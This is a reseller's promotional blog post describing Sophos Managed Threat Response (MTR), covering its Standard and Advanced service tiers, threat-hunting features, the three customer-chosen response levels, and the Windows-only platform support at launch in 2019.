Skip to content
Avanet
Sophos MTR - 24/7 Threat Hunting by Experts

Sophos MTR - 24/7 Threat Hunting by Experts

On October 1st, Sophos introduced a promising service that I would like to introduce to you in more detail. We are talking about MTR or, spelled out, Managed Threat Response. This new product is the result of the two acquisitions Rook Security and DarkBytes. Rook Security is particularly represented in the service area of this offering, while DarkBytes contributed its part of the technology with Managed Detection and Response (MDR).

What is Sophos Managed Threat Response (MTR)?

Sophos MTR is based on Intercept X Advanced with EDR and addresses the big, fat elephant in the room. 😅 If you have already read my article on Endpoint Detection and Response, you know where the added value of this product lies. But many customers simply don’t have the time to independently search for potential threats. In addition, this job requires highly qualified and specialized personnel with the right level of expertise. Such people are not only particularly difficult to find, but also command a very high salary level. If this service is to be extended to a 24-hour service, this will consume a very large part of the capital for your IT security. As a rule, only very large corporations have the opportunity and financial means to create special incentives for employees here.

This is precisely where Sophos’ new MTR service comes in, offering you a 24/7 service in the form of an elite security team that takes care of threat detection in your company and can intervene immediately in critical situations. The new MTR product is therefore not another menu item in your Central Admin Dashboard, but offers a targeted response by humans. Sophos particularly emphasizes autonomous intervention in this service. The Sophos MTR team will not only inform you of an attack, but, if desired, will also take the necessary measures on your behalf. You therefore receive a “fully-managed service”.

What variants of the MTR service are available?

We will definitely include the new MTR offering in our product catalog and will soon be able to offer it on our website. Basically, the service is available in the following variants:

  1. Central Intercept X Advanced with EDR and MTR [Standard / Advanced] - This is the bundle for all customers who have not yet purchased an EDR license. This applies to customers with, for example, “Intercept X Advanced” or just “Endpoint Protection”.
  2. Central MTR [Standard / Advanced] - This variant is suitable for all customers who already use “Intercept X Advanced with EDR” and want to purchase MTR as an add-on.

Standard or Advanced - What exactly are the differences?

As you can already see from the two variants listed above, Sophos MTR is offered in a Standard and an Advanced variant. Let’s take a look at what services are included in both packages:

Scope of services of the Standard variant

24/7 evidence-based threat hunting

Once you have licensed Sophos MTR and completed the onboarding process (more on this later), your Central Account will be connected to the automated system of the MTR team. Since this system is constantly learning, it can automatically react to known threats. The evidence-based threat hunting comes into play when something has been detected on your system that could not be fully resolved and requires human expertise. You can imagine this a bit like in the “Threat Analysis Center” in your Central Admin Account. There you will see, on the one hand, threats that have already been automatically stopped by Intercept X Advanced and, on the other hand, “suspicious objects” that were detected thanks to AI (artificial intelligence) but could not be resolved. In such a situation, the MTR team is there for you on a 24/7 basis. An expert will then examine the critical alert and, based on their experience, decide what severity this specific detection has and what needs to be done. The findings and knowledge from this incident are then transferred to the automated system of the MTR team. The next time the same detection occurs in a different scenario, the system can automatically react to it.

Attack detection

In parallel to evidence-based threat hunting, the MTR team pays particular attention to attacks executed via legitimate processes, such as PowerShell. Such attacks are very often successful because they are very difficult for monitoring tools to detect. The MTR team monitors these processes using self-developed analysis methods to ensure that they are not misused for malicious purposes.

Activity Reports

Transparency towards you as a customer is very important to the MTR team. Therefore, you receive activity reports that show you everything the MTR team has done on your behalf. You will learn the current state of your systems, what insights were gathered during the reporting period, and what threats were averted. Over the period you use the MTR service, a histogram of these reports will be created. With the help of this data, Sophos creates so-called “scorecards” with which you can compare yourself to previous periods. This provides you with the promised transparency and allows you to quickly recognize whether the MTR service benefits you.

Security Health Check

As you can see from the top three services, the MTR Standard service is about detecting threats and preventing attacks. However, the Security Health Check also ensures that your Sophos Central products, such as Intercept X Advanced with EDR, can always operate with maximum performance. For this, the MTR team addresses your network requirements and makes recommendations for configuration changes. You can therefore be sure that the Central products are perfectly tailored to your company.

Scope of services of the Advanced variant

Let’s look at what additional services are offered to you in the Advanced variant:

24/7 evidence-less threat hunting

In addition to evidence-based threat hunting in the Standard package, the Advanced variant also offers evidence-less threat hunting. Here, the expertise lies entirely with the MTR team’s analysts, who meticulously examine particularly important devices or user accounts in your company. They look at how communication is conducted in the network, whether suspicious processes are being executed, or if any other unusual or atypical behavior can be detected. With the collected data, they try to predict attacker strategies and identify new Indicators of Attack (IoA). If an incident is detected, you will be assigned a dedicated response leader who will assist you by phone with the complete resolution of the problem!

Optimized telemetry data

The MTR Standard package includes data provided by Intercept X Advanced with EDR. For improved telemetry, the Advanced version goes beyond mere detection of endpoint events and includes data from other Central products in the threat analysis.

Direct phone support

Another advantage of the Advanced variant is direct access to the MTR analyst team, which is available to you 24/7. So, if you have a question or, for example, would like to discuss a specific threat case, you can contact the Security Operations Center (SOC) directly by phone.

Proactive improvement of security status

In the Advanced package, the Security Health Check is taken to the next level. While the Standard variant provides general recommendations for the configuration of Central products, the MTR team now also considers the business context behind the configuration settings of, for example, a policy. You receive assistance in remedying configuration and architectural weaknesses that negatively impact your security.

Asset detection

Sophos’ specialist personnel not only discuss critical operational processes but also gain an overview of the applications used and identify possible attack vectors that can arise in the system as a result. The MTR team takes into account a so-called asset inventory, which helps to understand which applications are running on an endpoint and whether these are affected by open vulnerabilities. This generates valuable detailed information specifically tailored to the respective company.

What levels of support are offered by the Sophos MTR team?

Regardless of whether you choose the Standard or Advanced variant, you retain control over how autonomously the MTR team should operate. This is regulated right at the beginning during the so-called onboarding process. When you purchase the Sophos MTR service, you can choose from three options that determine what response you expect from the MTR team:

  1. Notification: If the Sophos MTR team has detected a threat incident or an attack, they will only inform you about it at this level, but will not act independently on your behalf. However, you will receive a detailed report on the cause and detection with actionable steps to resolve the threat yourself.
  2. Collaboration: The Sophos MTR team works together with your employees or an external consulting firm and responds to the corresponding threats.
  3. Authorization: Here, the MTR team takes care of containment and neutralization actions completely independently and only informs you about the measures taken.

What distinguishes Sophos MTR from competitors who also offer a comparable service?

Sophos names two competitors, SentinelOne and CrowdStrike, as offering the toughest competition. However, Sophos’ MTR service offers a decisive advantage. Autonomous action, and proactive at that, has not existed until now. Through the Authorization response level listed above, you no longer have to independently work through endless lists of error and threat messages with Sophos. All of this can now be handled on your behalf by trained specialists from Sophos.

While SentinelOne and CrowdStrike also offer such a service, it is only for the highest service tier, which a small business cannot afford. The highest authorization level for Sophos MTR, however, can be utilized by all companies, regardless of size or booked service level.

Which systems can Sophos currently serve with this service?

The service was only launched on October 1st. For this reason, currently only support for Windows Endpoint 32- and 64-bit is offered. Support for other systems, such as Windows Server, Linux, and Mac OS, is expected to follow at the end of November 2019. However, a precise date has not yet been named.

Furthermore, the service is only available in English in the first phase. However, it is planned to include other languages in the repertoire. When this will happen and which languages they will be is not yet fixed.

Conclusion on the Sophos Managed Threat Response Service

What I have read and heard about Sophos’ MTR service so far has really impressed me! This service from Sophos gives small and medium-sized companies the opportunity to afford comprehensive and professional IT security protection. The search for qualified and experienced personnel is thus greatly reduced, and you can rely on the experts from Sophos themselves.

I also find the three different support levels that Sophos offers all customers during the onboarding process very successful. You can therefore decide completely independently how much control you want to give up. The “Authorization Level” offer, which is also available in the Standard variant, is absolutely unrivaled! So you don’t need to purchase the more expensive Advanced package if Sophos specialists are to take care of your network security completely independently.

If you are now interested in Sophos MTR, please do not hesitate to contact us. We will soon publish the different variants of the MTR service on our website, so the price will no longer be a secret. We are also happy to clarify open questions in a personal conversation.

David

David

David is responsible for content, structure, and digital implementation at Avanet. His focus is on making complex technical topics clear, precise, and search-friendly.